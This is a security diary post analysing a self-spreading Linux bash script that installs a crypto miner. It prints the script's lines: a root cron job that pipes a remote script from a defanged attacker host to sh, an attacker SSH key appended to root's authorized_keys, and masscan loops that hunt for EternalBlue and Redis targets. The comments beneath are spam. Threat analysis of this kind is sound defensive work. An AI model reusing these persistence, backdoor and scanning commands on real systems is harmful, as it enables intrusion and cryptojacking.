Malicious Bash Script with Multiple Features

Published: 2018-03-05
Last Updated: 2018-03-05 10:22:49 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

It’s not common to find a complex malicious bash script. Usually, bash scripts are used to download a malicious executable and start it. This one has been spotted by @michalmalik[1] who twitted about it. I had a quick look at it. The script has currently a score of 13/50 on VT[2]. First of all, the script installs some tools and dependencies. 'apt-get' and 'yum'  are used, this means that multiple Linux distributions are targeted. The following packages are installed: wget, git, make, python, redis-tools, gcc, build-essentials. Some Python packages are installed via PIP.

The primary goal of the script is to install a crypto miner. To optimize performances, the number of CPUs is tested:

if [ $cpunum -gt 4 ];
then
threads=`expr $cpunum / 2`
else
threads=$cpunum

Three first files are downloaded:

hxxp://xksqu4mj.fri3nds[.]in/tools/clay
hxxp://xksqu4mj.fri3nds[.]in/tools/minerd
hxxp://xksqu4mj.fri3nds[.]in/tools/glibc-2.14.tar.gz

'clay' is a known trojan[3]. 'minerd' is, as the name says, a crypto miner[4]. This is an x64 binary. 'glib-2.14.tar.gz' (SHA256: 18d9a0296260fd9529d59229c1dcb130ee8a18a1dd71c23712c39056cc0eb0b3) contains the libraries required by minerd. The crypto miner uses stratum+tcp://pool.fri3nds.in:8080

Then crontab entries are added for persistence:

echo "*/5 * * * * curl -fsSL hxxp://xksqu4mj.fri3nds[.]in/tools/transfer.sh | sh" > /var/spool/cron/root

The nasty stuff is the installation of the attack SSH key:

echo "ssh-rsa AAAAB3N ...[redacted]... Mq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys

I don't know why they add a key for the root user. By default, ssh does not allow root login. They should create a new user and add it to the 'sudo' group!

Then, Redis via port TCP/6379 (see below why):

PS3=$(iptables -L | grep 6379 | wc -l)
if [ $PS3 -eq 0 ];
then
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save

The next step is to download the 'masscan' port scanner and another bunch of scripts:

hxxps://github[.]com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
hxxp://xksqu4mj.fri3nds[.]in/tools/unixinfect.tar.gz

The tar file contains scripts which generate ranges of IP addresses and scan for EternalBlue[4] vulnerable hosts (Windows hosts):

#!/bin/bash
ython rangeip.py
while read line
do
    masscan -p445 $line --rate=20000 | tee -a masscan
    python order.py
    sh ebrun.sh
done < ip

For Linux hosts, Redis vulnerable instances are targeted:

#!/bin/bash
python rangeip.py
while read line
do
    masscan -p6379 $line --rate=20000 | tee -a masscan
    python order.py
    sh redisrun.sh
done < ip

The goal is to find new vulnerable hosts, pivot (lateral movement) and deploy the same script.

As a final note, some attackers are able to write "nice" (read: malicious code) but they still fail to protect their resources. All their material is available via directory indexing:

Credit to finding the script goes to Michal Malik[6].

[1] https://twitter.com/michalmalik/status/969634267532873728
[2] https://www.virustotal.com/en/file/ae71d81ed3a1f9a9f83c2973184dd6ab51ca4b5728ccfbab9885399e54379274/analysis/
[3] https://www.virustotal.com/intelligence/search/?query=260ef4f1bb0e26915a898745be873373f083227a4f996731f9a3885397a49e79
[4] https://www.virustotal.com/intelligence/search/?query=2d89b48ed09e68b1a228e08fd66508d349303f7dc5a0c26aa5144f69c65ce2f2
[5] https://isc.sans.edu/forums/diary/ETERNALBLUE+Windows+SMBv1+Exploit+Patched/22304/
[6] https://twitter.com/michalmalik

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 comment(s)
ISC Stormcast For Monday, March 5th 2018 https://isc.sans.edu/podcastdetail.html?id=5895

Comments

cwqwqwq
eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>
WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]
dwqqqwqwq mashood
[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)
[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]
What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/

Diary Archives